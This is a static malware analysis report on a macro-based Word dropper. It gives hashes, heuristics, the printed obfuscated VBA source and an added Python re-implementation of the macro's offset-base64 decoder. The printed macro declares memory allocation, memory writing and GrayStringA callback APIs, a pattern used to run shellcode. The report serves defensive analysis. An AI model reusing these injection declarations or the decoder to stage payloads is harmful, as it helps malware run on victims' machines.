Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8b1585b6fbb5eda8…

MALICIOUS

Office (OLE)

Size: 168.0 KB | Created: 2017-02-20 12:58:00 (taken from the document's own OLE metadata, which is attacker-controlled) | Authoring application: Microsoft Office Word | First seen: 2017-08-08
MD5: 88aa22982ed11b76bd034484ca9226d7
SHA-1: 578c1cf74e5a3401a3db4e45c030aa1c3f818ff9
SHA-256: 8b1585b6fbb5eda8d36e898c791d28aa4a463f9bad6a044885b240a1b33f5e03
Risk score: 162

Malware Insights

MITRE ATT&CK
T1059.005 (Command and Scripting Interpreter: Visual Basic)
T1566.001 (Phishing: Spearphishing Attachment)

The sample contains VBA macros. The auto-execution token (a 'Document_Open' handler) and the execution token (a 'Shell' call) that drive the dropper classification were found in the compiled p-code stream (see OLE_VBA_PCODE_AUTOEXEC_EXEC); note that the decoded source preview below contains neither a Document_Open handler nor a Shell call, so the visible source and the compiled stream do not agree, which is itself worth flagging. What the decoded source does show is a module ("berteroa") with obfuscated Declare statements, split into Win64 and Win32 variants, for ntdll!NtAllocateVirtualMemory, ntdll!NtWriteVirtualMemory and user32!GrayStringA (an API that takes a callback function pointer), plus a custom decoding routine (task / cloudcompeller / subsonic) that turns a string into a byte buffer of up to 6966 bytes. That combination of imports is commonly used to place a decoded payload in memory and transfer execution to it, although the call site and the encoded string are not present in the preview; the remaining GenerateGlossary routine only creates and saves a new document named "word". The 'SE_MFA_LURE' heuristic indicates the document body asks the user for a one-time code or an MFA approval, a credential-phishing lure rather than an exploit. The ClamAV signature 'Doc.Dropper.ZwMacros-6057750-0' independently classifies the file as a macro-based dropper.

Heuristics (5)

  • ClamAV: Doc.Dropper.ZwMacros-6057750-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.ZwMacros-6057750-0
  • MFA / one-time-code harvesting lure [high] SE_MFA_LURE
    Document asks for a one-time code, authenticator approval, or MFA confirmation, consistent with credential phishing kits that steal session tokens or abuse multi-factor authentication
  • VBA macros detected [medium] OLE_VBA_MACROS (1 related finding)
    Document contains VBA macro code
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable, and documents whose compiled p-code differs from the source that is shown.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
      • http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
      • http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
      • http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
      • http://purl.org/dc/elements/1.1/ (in document text, OLE body)
      • http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
      • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
      • http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
    All seven URLs are XMP, RDF and Dublin Core schema namespace identifiers of the kind carried in embedded image metadata; they are not network indicators and should not be treated as download or C2 locations.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename   | Kind      | Source                                              | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8997 bytes
SHA-256: 4e37b735f5e0ee47fc81a6e010b0d16cb3f16de020703b75ecd0cd9174c08ecb

Preview script
First 1,000 lines of the extracted script (the decoded source: the ThisDocument attributes, the "berteroa" module holding the API declarations and the decoder, and the attribute header of the "atlarge" module)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "berteroa"
'  Chasing the stars, chasing the stars
'  Wings spread to the sun
#If Win64 Then
'  I miss you so much, I miss you so much
'  Love don't come easy at all
Public Declare PtrSafe Function straightaway Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal pimp As LongPtr,amauropelta As LongPtr,frogbit As LongPtr,monosaccharide As LongPtr,connecticuter As LongPtr) As Boolean
'  I miss you so much, I miss you so much
'  I miss you so much, I miss you so much
Public Declare PtrSafe Function dii Lib "Shell32.dll" Alias "SHGetDesktopFolder" (squaw As LongPtr)
'
'
Public Declare PtrSafe Function musnud Lib "Shlwapi.dll" Alias "PathFileExists" (berkshires As LongPtr) As LongPtr
'  I miss you so much, I miss you so much
'
Public Declare PtrSafe Function argentic Lib "Ntdll.dll  " Alias "NtWriteVirtualMemory" (ByVal optinionist As Any, ByVal cyanosis As Any, ByVal subdolous As Any, ByVal orthoptera As Any, ByVal garble As Any) As LongPtr
'  Baby I'm yours, baby I'm yours
'  I miss you so much, I miss you so much
Public  Declare PtrSafe Function cured Lib "User32.dll" Alias "GrayStringA" ( ByVal ketoprofen As Any, ByVal fulgoridae As Any, ByVal crystallization As Any, ByVal feria As Any, ByVal fenian As Any, ByVal asking As Any, ByVal accreditation As Any, ByVal nonassemblage As Any, ByVal chlorate As Any) As Long
'  Baby I'm yours, baby I'm yours
'  I miss you so much, I miss you so much
Public Declare PtrSafe Function aerological Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (muzzy As LongPtr, land As Any,crossquestion As LongPtr, outdoor As Any) As Boolean
'
'  Chasing after danger, making my heart race, woah
Public Declare PtrSafe Function autarky Lib "Shell32.dll" Alias "SHGetSettings" (tetchily As LongPtr,belong As LongPtr) As LongPtr
'  He was a dreamer at heart
'
Public Declare PtrSafe Function mammalogy Lib "ntdll.dll" Alias "NtAllocateVirtualMemory" (flyblown As LongPtr, oversolicitous As LongPtr, ByVal iranian As LongPtr,berkeliumByVal As LongPtr, bifurcated As LongPtr, ByVal ultimatum As LongPtr) As LongPtr
'  I miss you so much, I miss you so much
'  I miss you so much, I miss you so much

'  Tell me, is this freedom, baby?
'  Wings spread to the sun
#Else
'  Maybe in a million miles, on a highway through the skies
'  I miss you so much, I miss you so much
Public Declare Function surrealism Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (taxonomy As Long, balconied As Any, shindig As Long, avenger As Any) As Boolean
'  Maybe if the stars align, maybe if our worlds collide
'  Someday soon, we'll be together
Public Declare Function cured Lib "User32.dll" Alias "GrayStringA" (ByVal merchangman As Any, ByVal mesic As Any, ByVal flu As Any, ByVal psychopharmacological As Any, ByVal hammered As Any, ByVal attestation As Any, ByVal sinewless As Any, ByVal wolof As Any, ByVal dyad As Any) As Long
'
'
Public Declare Function argentic Lib "Ntdll.dll  " Alias "NtWriteVirtualMemory" (ByVal restraint As Any, ByVal vituperation As Any, ByVal tsquare As Any, ByVal pediculidae As Any, ByVal layia As Any) As Long
'
'  Chasing after danger, making my heart race, woah
Public Declare Function symphoricarpos Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal paleacrita As Long, embroilment As Long, indestructible As Long, drugs As Long, bitumen As Long) As Boolean
'
'  He was a dreamer at heart
Public Declare Function pins Lib "Shlwapi.dll" Alias "PathFileExists" (regentship As Long) As Long
'  Baby I'm yours, baby I'm yours
'  Maybe in a million miles, on a highway through the skies
Public Declare Function perambulate Lib "Shell32.dll" Alias "SHGetDesktopFolder" (balinese As Long)
'  Someday soon, we'll be together
'
Public Declare Function mammalogy Lib "Ntdll.dll" Alias "NtAllocateVirtualMemory" (iridium As Long, daemon As Long, ByVal endomorph As Long, suckleByVal As Long, arietation As Long, ByVal coxswain As Long) As Long
'  Maybe in a million miles, on a highway through the skies
'  Chasing the stars, chasing the stars
Public Declare Function alytes Lib "Shell32.dll" Alias "SHGetSettings" (dendrolagus As Long, bootlegger As Long) As Long
'
'  Tell me, is this freedom, baby?

'
'
#End If
'  Baby I'm yours, baby I'm yours
'  He was a dreamer at heart
Sub GenerateGlossary()
      Dim strSource As String
      Dim strDestination As String
      Dim strGlossaryName As String

      strSource = ActiveWindow.Caption
      strGlossaryName = "word"

      Documents.Add
      ActiveDocument.SaveAs FileName:=strGlossaryName, FileFormat:=wdFormatDocument
      strDestination = ActiveWindow.Caption
      Windows(strSource).Activate
  End Sub

Function task()
Dim antigen(255) As Byte
adder = 65
Do
antigen(adder) = adder - 65
adder = adder + 1
Loop Until adder = 91
adder = 48
Do
antigen(adder) = adder + 4
adder = adder + 1
Loop Until adder = 58
adder = 97
Do
antigen(adder) = adder - 71
adder = adder + 1
Loop Until adder = 123
antigen(47) = 63
adder = 43
antigen(adder) = 62
task = antigen
End Function
Function walkin(kanchenjunga)
walkin = AscW(kanchenjunga)
End Function
Function cloudcompeller(courtier) As String
Dim corinthians As Long
Dim motto As Long
Dim connote As Integer
Dim selfforgetful As Long
Dim abdal(63) As Long
Dim embellished() As Byte
elegy = electrotherapist

Dim wahrheil As String
Dim ardor As Integer

Dim airfield(63) As Long
Dim rupert(6965) As Byte
Dim beached As Byte

lusterware = Fix(109)

Dim abecedarian As Long
Dim conjugation As Byte

Dim arterial(63) As Long
Dim brat As Byte

electrotherapist = electrotherapist

cervine = 30 - 46 + 4112
Dim gaga As Variant

aft = 63
Dim essaying As Integer

abnormal = 65280
scrannel = 256
additionally = 124 + 3908
althea = 71 + 184
heterobasidiomycetes = 65536
equipollent = 258048
indirectly = 97 + 16514975
flooded = 124 + 2 - 62
mick = 106 + 16711574
Dim absently As String

gadding = 262144
Dim disturb As Variant
pickeer = 0
platter = 40 + 98 + 5705
Dim duodecimal() As Byte
Dim munditiis As String
duodecimal = VBA.Strings.StrConv(courtier, vbFromUnicode)
Dim paradisaeidae As Variant
bilgy = 94
appetizingness = 30442
bacchanalia = 162378
autotelic = NPer(57 / 464, bilgy, -19855, bacchanalia, 1)

spherule = 5843
delenda = Sqr(RGB(0, 1, 0))
For evulsion = 0 To spherule
If evulsion Mod 2 = 0 Then
duodecimal(evulsion) = duodecimal(evulsion) + delenda
Else
duodecimal(evulsion) = duodecimal(evulsion) + delenda - 1
End If
Next evulsion
melanoblast = 4
challengeable = 184
irishism = 57516
cenogenetic = 365762
cenogenetic = SYD(cenogenetic, irishism, challengeable, melanoblast)

connote = 0
edel = 96 + 122 + 26 - 244
maxillomandibular = 18 + 25
basswood = task
For selfforgetful = 0 To 63
abdal(selfforgetful) = subsonic(selfforgetful, flooded, 33)
airfield(selfforgetful) = subsonic(selfforgetful, cervine, 33)
arterial(selfforgetful) = subsonic(selfforgetful, gadding, 33)
Next selfforgetful
disunction = 86
harding = 14384
bast = 517527
brassband = NPer(73 / 585, disunction, -12947, bast, 0)

embellished = duodecimal
conidium = 69 - 103 - 6 + 44
bokmal = 2
fourspot = 330
tenax = 20128
slackening = 455545
slackening = SYD(slackening, tenax, fourspot, bokmal)

miseria = 3
kilt = Rnd(72)

kilt = geometridae / 442

forgetfulness = miseria + 1
deceptious = 2
For corinthians = 0 To spherule
pendragon = embellished(corinthians)
aether = embellished(corinthians + 2)
abecedarian = arterial(basswood(pendragon)) _
 + airfield(basswood(embellished(corinthians + 1))) + abdal(basswood(aether)) + basswood(embellished(corinthians + miseria))
selfforgetful = subsonic(abecedarian, mick, 25)
rupert(motto) = subsonic(selfforgetful, heterobasidiomycetes, 15)
selfforgetful = subsonic(abecedarian, abnormal, 25)
rupert(motto + 1) = subsonic(selfforgetful, scrannel, 15)
rupert(motto + deceptious) = subsonic(abecedarian, althea, 25)
motto = motto + deceptious + 1
corinthians = corinthians + 3
Next
cloudcompeller = rupert
End Function

Function subsonic(bridge, katharometer, promotional)
Select Case promotional
Case 15
subsonic = bridge \ katharometer
Case 25
subsonic = bridge And katharometer
Case 33
subsonic = bridge * katharometer
End Select
End Function


Attribute VB_Name = "atlarge"
Attribute VB_Base = "0{CFC1189C-072B-470A-A2DA-618C4AA7F2C5}{B3FBE50C-D5D0-48A8-85F8-3ED4F4B05D82}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
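The task / cloudcompeller / subsonic routines in the "berteroa" module above are an obfuscated base64 decoder: task() builds the RFC 4648 alphabet table, cloudcompeller() first adds 16 to every even-positioned character and 15 to every odd-positioned one (delenda = Sqr(RGB(0, 1, 0)) = 16), then packs four 6-bit values into a 24-bit group using the precomputed multiplier tables (flooded = 64, cervine = 4096, gadding = 262144) and splits it into three bytes with the masks mick = 0xFF0000, abnormal = 0xFF00 and althea = 0xFF. The Python below is an added re-implementation written for this page, not code from the sample or from the analysis platform; it keeps the macro's names and arithmetic but generalises the fixed 5844-character input (spherule = 5843) to any length that is a multiple of four. The string the macro passes in as courtier is not in the preview, so the inputs here are constructed with an assumed inverse transform (encode_for_macro) purely to exercise the decoder.

```python
"""Re-implementation of the macro's string decoder (task / cloudcompeller /
subsonic). Added example, not the sample's own code."""
import base64
import math


def vba_rgb(r: int, g: int, b: int) -> int:
    """VBA's RGB(): r + g*256 + b*65536."""
    return r + (g << 8) + (b << 16)


# Constants exactly as the macro computes them (decimal value in the comment).
DELENDA = int(math.sqrt(vba_rgb(0, 1, 0)))  # Sqr(256) = 16: per-character offset
FLOODED = 124 + 2 - 62                      # 64    = 2**6
CERVINE = 30 - 46 + 4112                    # 4096  = 2**12
GADDING = 262144                            # 2**18
MICK = 106 + 16711574                       # 0xFF0000
ABNORMAL = 65280                            # 0xFF00
ALTHEA = 71 + 184                           # 0xFF
HETEROBASIDIOMYCETES = 65536                # 2**16
SCRANNEL = 256                              # 2**8


def task() -> list:
    """256-entry lookup: ASCII code -> 6-bit value (the macro's 'antigen')."""
    antigen = [0] * 256
    for code in range(65, 91):      # 'A'..'Z' -> 0..25
        antigen[code] = code - 65
    for code in range(48, 58):      # '0'..'9' -> 52..61
        antigen[code] = code + 4
    for code in range(97, 123):     # 'a'..'z' -> 26..51
        antigen[code] = code - 71
    antigen[47] = 63                # '/'
    antigen[43] = 62                # '+'
    return antigen


def subsonic(bridge: int, katharometer: int, promotional: int) -> int:
    """Opcode-selected arithmetic: 15 = integer divide, 25 = AND, 33 = multiply."""
    if promotional == 15:
        return bridge // katharometer
    if promotional == 25:
        return bridge & katharometer
    if promotional == 33:
        return bridge * katharometer
    raise ValueError(f"unknown opcode {promotional}")


def cloudcompeller(courtier: str) -> bytes:
    """Decode the offset base64 string into raw bytes the way the macro does."""
    duodecimal = bytearray(courtier.encode("latin-1"))  # StrConv(..., vbFromUnicode)
    if len(duodecimal) % 4:
        raise ValueError("input length must be a multiple of 4")
    # Undo the obfuscation offset: +16 on even positions, +15 on odd ones.
    for i in range(len(duodecimal)):
        duodecimal[i] += DELENDA if i % 2 == 0 else DELENDA - 1
    basswood = task()
    abdal = [subsonic(i, FLOODED, 33) for i in range(64)]     # i * 2**6
    airfield = [subsonic(i, CERVINE, 33) for i in range(64)]  # i * 2**12
    arterial = [subsonic(i, GADDING, 33) for i in range(64)]  # i * 2**18
    rupert = bytearray()
    for c in range(0, len(duodecimal), 4):
        # Four 6-bit values packed into one 24-bit group, then split into 3 bytes.
        abecedarian = (arterial[basswood[duodecimal[c]]]
                       + airfield[basswood[duodecimal[c + 1]]]
                       + abdal[basswood[duodecimal[c + 2]]]
                       + basswood[duodecimal[c + 3]])
        rupert.append(subsonic(subsonic(abecedarian, MICK, 25), HETEROBASIDIOMYCETES, 15))
        rupert.append(subsonic(subsonic(abecedarian, ABNORMAL, 25), SCRANNEL, 15))
        rupert.append(subsonic(abecedarian, ALTHEA, 25))
    return bytes(rupert)


def lookup_is_standard_base64() -> bool:
    """True if task() is exactly the RFC 4648 base64 alphabet."""
    alphabet = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
    antigen = task()
    return all(antigen[code] == value for value, code in enumerate(alphabet))


def encode_for_macro(payload: bytes) -> str:
    """Assumed inverse transform, used only to build test input: base64, then
    subtract 16 from even positions and 15 from odd ones."""
    b64 = base64.b64encode(payload).decode("ascii")
    return "".join(chr(ord(ch) - (DELENDA if i % 2 == 0 else DELENDA - 1))
                   for i, ch in enumerate(b64))


if __name__ == "__main__":
    sample = bytes([0x90, 0x90, 0xCC]) * 8  # constructed stand-in, not from the sample
    blob = encode_for_macro(sample)
    print("alphabet is standard base64:", lookup_is_standard_base64())
    print("round trip ok:", cloudcompeller(blob) == sample)
```

To use it on the real sample, recover the string the macro passes as courtier (it is not in the preview; it must come from another stream or module of the document) and call cloudcompeller() on it, then inspect the returned bytes as a candidate payload. As in the macro, a trailing base64 '=' maps to table entry 0 and therefore produces a zero byte rather than being stripped.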